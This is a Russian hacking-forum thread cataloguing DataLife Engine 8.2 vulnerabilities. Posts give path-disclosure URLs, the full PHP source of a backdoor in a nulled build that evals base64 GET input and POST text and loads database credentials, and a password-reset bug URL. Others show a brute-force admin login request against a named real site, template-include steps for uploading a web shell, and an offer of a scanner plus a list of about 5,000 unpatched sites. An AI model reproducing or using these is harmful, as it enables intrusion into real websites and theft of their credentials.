[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Раскрытие путей
    DataLife Engine 8.2 Без всяких куков

    1)файл preview.php
    PHP:
    require_once ROOT_DIR.'/engine/classes/templates.class.php';
    самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что
    константа *в не понятках*

    вызываем этот файл:
    http://dle/engine/inc/preview.php
    получаем
    на офф сайте даже канает)

    + 2)еще ругается с файла Init.php
    PHP:
    require_once (ENGINE_DIR '/inc/include/functions.inc.php');
    extract$_REQUESTEXTR_SKIP );
    require_once (
    ENGINE_DIR '/data/config.php');
    http://dle/engine/inc/include/init.php

    +3) нужны куки :)

    engine/ajax/antivirus.php
    PHP:
    if (isset( $_COOKIE['selected_language'] )) { 

        
    $_COOKIE['selected_language'] = totranslit$_COOKIE['selected_language'], falsefalse );

        if (@
    is_dir ROOT_DIR '/language/' $_COOKIE['selected_language'] )) {
            
    $selected_language $_COOKIE['selected_language'];
        }

    }

    require_once 
    ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

    все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку

    +4) самое бональное раскрытие

    engine/modules/imagepreview.php
    PHP:
    $_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES);
    $_GET['image'] = str_replace"document.cookie"""$_GET['image'] );
    $_GET['image'] = str_replace"javascript"""$_GET['image'] );
    http://dle/engine/modules/imagepreview.php?image[]=
    PS и не нужны куки здесь)
    Зыы ну почти не нужны
     
    _________________________
    #81 HAXTA4OK, 18 Oct 2009
    Last edited: 19 Oct 2009
    3 people like this.
  2. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Был найден бэкдор в нулле от -=ZLOY=-
    В этом файле был бэкдор. eval() через $_POST
    Файл лежит в (/engine/ajax/updates.php)
    Код бэкдора
    PHP:
    if($_GET['wert']==''){
    require_once 
    ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
    $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
    @
    header("HTTP/1.0 200 OK");
    @
    header("HTTP/1.1 200 OK");
    @
    header("Cache-Control: no-cache, must-revalidate, max-age=0");
    @
    header("Expires: 0");
    @
    header("Pragma: no-cache");
    @
    header("Content-type: text/css; charset=".$config['charset']);
    $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
    if (!
    strlen($data)) echo $lang['no_update']; else echo $data;
    }else{
    $file=(ROOT_DIR."/engine/classes/mysql.class.php");
    if(
    file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
    $file=(ROOT_DIR."/engine/data/dbconfig.php");
    if(
    file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
    $file=(ROOT_DIR."/engine/data/config.php");
    if(
    file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
    eval(
    base64_decode($_GET['user_id']));
    echo <<<HTML
    <HTML><body><form action="" method="post">
    <center><textarea name="text" rows="10" cols="100"></textarea>
    <br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
    HTML;
    if(
    $_POST['text']!=''){eval(stripcslashes($_POST['text']));
    }} 
     
    #82 S0ulVortex, 5 Nov 2009
    Last edited: 6 Nov 2009
  3. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Найдена уязвимость в DLE 8.2(Только в этой версии)
    /index.php?do=lostpassword&douser=1&lostid=
    Получаем пас от пользователя с id 1
    На офф сайте уже доступна заплатка.
    В новых версиях дле даже можно версию узнать ))
    engine/skins/images/logos.jpg
    Теперь у каждой версии в админки стоит версия в лого )
    Это просто шикарно )
     
    #83 EST a1ien, 12 Nov 2009
    Last edited: 12 Nov 2009
    3 people like this.
  4. Getozz

    Getozz Banned

    Joined:
    16 Jun 2009
    Messages:
    62
    Likes Received:
    36
    Reputations:
    1
    Еще одна бага есть. можн залить шелл с помощю категорий. создаете категорию туда свой шаблон с шеллом. вродь до 7.2 у мя пахало
     
  5. Useroff

    Useroff Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    146
    Likes Received:
    27
    Reputations:
    -3
    8.2, раскрытие путей

    selected_language = .
    admin.php
     
  6. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Можно на images.google.ru вбить

    http://images.google.ru/images?hl=ru&source=hp&q=%22engine%2Fskins%2Fimages%2Flogos.jpg%22+Datalife+Engine&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%BE%D0%BA&gbv=2&aq=f&oq=
     
    1 person likes this.
  7. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL.

    http://depositfiles.com/files/6s4qs35gb

    Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам. :D

    Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
     
    #87 slva2000, 24 Nov 2009
    Last edited: 24 Nov 2009
    1 person likes this.
  8. hellorin

    hellorin New Member

    Joined:
    15 Jan 2008
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Сцыль с базой обовить бы ...
     
  9. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    брутфорс адмики

    https://forum.antichat.ru/thread153641.html

    бага в посылке пакета без кукисов.

    http://vipuzor.com/admin.php
    Host: vipuzor.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.20) Gecko/20091111 Firefox/3.1.3.37
    Referer: http://vipuzor.com/admin.php
    Content-Type: application/x-www-form-urlencoded
    POST
    subaction=dologin&username=admin&password=111111​
     
    _________________________
    2 people like this.
  10. zetaap

    zetaap New Member

    Joined:
    7 May 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    slva2000 Ссылочки обновите пожалуйста
     
  11. Useroff

    Useroff Elder - Старейшина

    Joined:
    23 Aug 2008
    Messages:
    146
    Likes Received:
    27
    Reputations:
    -3
    Боян - .htaccess

    // будет работать на старых версиях, в новых хтакссесс поумалчанию залит.
    H00k
     
    #91 Useroff, 2 Jan 2010
    Last edited by a moderator: 12 Jan 2010
  12. Balancer

    Balancer New Member

    Joined:
    9 Jan 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Проинклудил я main.tpl, а как зайти в шел не понятно. Объясните нубу, пожалуйста! :confused:
     
  13. YuxaS

    YuxaS New Member

    Joined:
    31 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    а для этого не нужно в index.php менять строчку:
    echo $tpl->result['main'];
    на
    eval (' ?' . '>' . $tpl->result['main'] . '<' . '?php '); ??
    или я что то не правильно понял ? объясните кто нибудь...

    и ещё один вопрос, может кто знает, что нужно сделать, чтобы пароли при регистрации сохранялись в базу - как есть, без md5 кодирования ?
     
  14. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Есть. в login.tpl

    или там где выбор шаблона для категории.

    или же инклудь в маин.тпл
     
    1 person likes this.
  15. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    При помощи этого товарища и своих усилей нашёл способ заливки шелла через админ панель, впрочем она нечем не отличается от выше указанных просто в версиях от 8.0, а именно в 8.2 нужно в маин.тпл инклудить при помощи тега:
    Code:
    {include file="file.php"}
     
    3 people like this.
  16. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    :)
     
    #96 RedX, 31 Jan 2010
    Last edited: 31 Jan 2010
  17. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Вопрос. Такой. есть Доступ к БД. Могу сдлеать юзеру админ права. Но немогу найти админку. что посоветуете?
     
  18. flagmen

    flagmen New Member

    Joined:
    14 Nov 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Сделай юзеру админ права и войди в аккаунт юзера, там наверняка и появится ссыль в админ панель
     
  19. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    :D Ты думаешь я не проверял ))) они заходят набирая путь до админки руками
     
  20. MagNomeTik

    MagNomeTik Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    38
    Likes Received:
    45
    Reputations:
    1
    В последних версиях DLE в меню редактирования любой новости есть пункт "Редактировать новость (Админка)".
    Выделяешь этот пункт и видишь в строке состояния примерно такую вещь http://сайт/admin.php?mod=editnews&action=editnews&id=25303
    Отсюда можешь уже можешь разглядеть)
     
    1 person likes this.